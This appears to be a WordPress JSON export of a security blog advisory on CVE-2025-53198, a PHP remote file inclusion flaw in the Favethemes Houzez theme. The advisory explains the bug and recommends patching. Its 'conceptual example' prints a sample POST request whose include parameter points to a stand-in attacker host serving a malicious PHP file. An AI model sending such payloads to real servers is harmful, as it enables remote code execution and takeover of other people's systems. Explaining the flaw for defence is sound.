{"id":71664,"date":"2025-09-06T04:59:22","date_gmt":"2025-09-06T04:59:22","guid":{"rendered":""},"modified":"2025-09-29T02:50:19","modified_gmt":"2025-09-29T08:50:19","slug":"cve-2025-53198-php-remote-file-inclusion-vulnerability-in-favethemes-houzez","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-53198-php-remote-file-inclusion-vulnerability-in-favethemes-houzez\/","title":{"rendered":"<strong>CVE-2025-53198: PHP Remote File Inclusion Vulnerability in Favethemes Houzez<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>A significant security vulnerability has been identified in the Favethemes Houzez PHP program, which affects all versions up to 4.0.4. This vulnerability, identified as CVE-2025-53198, is related to an improper control of filename for Include\/Require Statement, also known as a PHP Remote File Inclusion. Given the ubiquity of PHP in web development, and particularly the widespread usage of Favethemes Houzez, this <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-55731-sql-injection-vulnerability-in-frappe-framework-leading-to-potential-data-leakage\/\"  data-wpil-monitor-id=\"79280\">vulnerability could potentially<\/a> affect a large number of websites and their users. The severity of this issue is further compounded by its <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-42957-critical-backdoor-vulnerability-in-sap-s-4hana-exposes-systems-to-potential-compromise\/\"  data-wpil-monitor-id=\"79598\">potential for system<\/a> compromise or data leakage.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-53198<br \/>\nSeverity: High (8.1 CVSS Score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: Low<br \/>\nUser Interaction: None<br \/>\nImpact: <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-47136-integer-underflow-vulnerability-in-indesign-desktop-versions-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"79729\">Potential system<\/a> compromise or data leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-3116646724\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 720px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 22px; font-weight: 600; display: flex; align-items: center; letter-spacing: -0.02em;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 10px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 42px; height: 42px;\" \/>\r\n    <\/a>\r\n    Share secrets securely\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 14px; color: #d1d5db;\">\r\n    Ameeba is private infrastructure for communication and sensitive work built on encrypted identity instead of exposed corporate identity systems.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 18px; color: #a1a1aa;\">\r\n    Passwords, credentials, confidential files, screenshots, internal discussions, sensitive AI context, and private coordination should not become exposed across ordinary communication platforms.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 24px; color: #e4e4e7;\">\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Encrypted identity<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Private Spaces for organizations and teams<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 End-to-end encrypted chat, calls, files, and notes<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Sensitive AI work and protected collaboration<\/li>\r\n    <li>\u2022 Built for information that cannot leak<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px; color: #ffffff;\">\r\n    Our mission is to secure human work alongside AI.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 8px; font-weight: 500;\">\r\n      Download Ameeba\r\n    <\/a>\r\n\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 8px; font-weight: 500;\">\r\n      Learn More\r\n    <\/a>\r\n  <\/div>\r\n<\/div><\/div>\n<p>Product | Affected Versions<\/p>\n<p>Favethemes Houzez | Up to 4.0.4<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-50870-incorrect-access-control-vulnerability-in-institute-of-current-students-1-0\/\"  data-wpil-monitor-id=\"79309\">vulnerability arises from improper control<\/a> of filename for Include\/Require Statement in the PHP program. This can allow an attacker to inject a file from a remote server, circumventing the need for <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3671-critical-local-file-inclusion-vulnerability-in-wpgym-wordpress-gym-management-system-plugin\/\"  data-wpil-monitor-id=\"80511\">local file inclusion<\/a>. In essence, the attacker can manipulate the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-25174-critical-php-remote-file-inclusion-vulnerability-in-beeteam368-extensions\/\"  data-wpil-monitor-id=\"81097\">PHP &#8216;include&#8217; or &#8216;require&#8217; statement to reference a specific file<\/a> on their own server, effectively running their own code on the targeted system.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-2675919068\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Here&#8217;s a conceptual example of how the vulnerability might be exploited:<\/p>\n<pre><code class=\"\" data-line=\"\">POST \/vulnerable\/endpoint HTTP\/1.1\nHost: target.example.com\nContent-Type: application\/x-www-form-urlencoded\ninclude=http:\/\/attacker.com\/malicious_file.php<\/code><\/pre>\n<p>In this hypothetical example, the attacker sends a POST <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-52797-critical-cross-site-request-forgery-csrf-vulnerability-in-josepsitjar-storymap\/\"  data-wpil-monitor-id=\"79366\">request to the vulnerable<\/a> endpoint on the target server. The &#8216;include&#8217; parameter references a <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-7390-malicious-client-bypass-of-opc-https-server-certificate-trust-check\/\"  data-wpil-monitor-id=\"81872\">malicious PHP file hosted on the attacker&#8217;s server<\/a>. If the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-53727-sql-server-vulnerability-leading-to-privilege-escalation\/\"  data-wpil-monitor-id=\"79548\">server is vulnerable<\/a>, it would download and execute the malicious PHP file, granting the attacker control over the server.<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>To mitigate the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-55293-high-risk-vulnerability-in-meshtastic-s-mesh-networking-solution\/\"  data-wpil-monitor-id=\"81334\">risk posed by this vulnerability<\/a>, users are urged to apply the patch provided by the vendor. In cases where immediate patching is not possible, the use of a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can provide temporary mitigation by monitoring and potentially blocking suspicious activities. However, these measures should be considered temporary, and it is strongly recommended that the vendor&#8217;s patch be applied as soon as <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-54742-data-deserialization-vulnerability-in-wpevently-leading-to-possible-system-compromise\/\"  data-wpil-monitor-id=\"86427\">possible to fully address the vulnerability<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview A significant security vulnerability has been identified in the Favethemes Houzez PHP program, which affects all versions up to 4.0.4. This vulnerability, identified as CVE-2025-53198, is related to an improper control of filename for Include\/Require Statement, also known as a PHP Remote File Inclusion. Given the ubiquity of PHP in web development, and particularly [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-71664","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/71664","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=71664"}],"version-history":[{"count":11,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/71664\/revisions"}],"predecessor-version":[{"id":79227,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/71664\/revisions\/79227"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=71664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=71664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=71664"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=71664"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=71664"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=71664"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=71664"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=71664"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=71664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}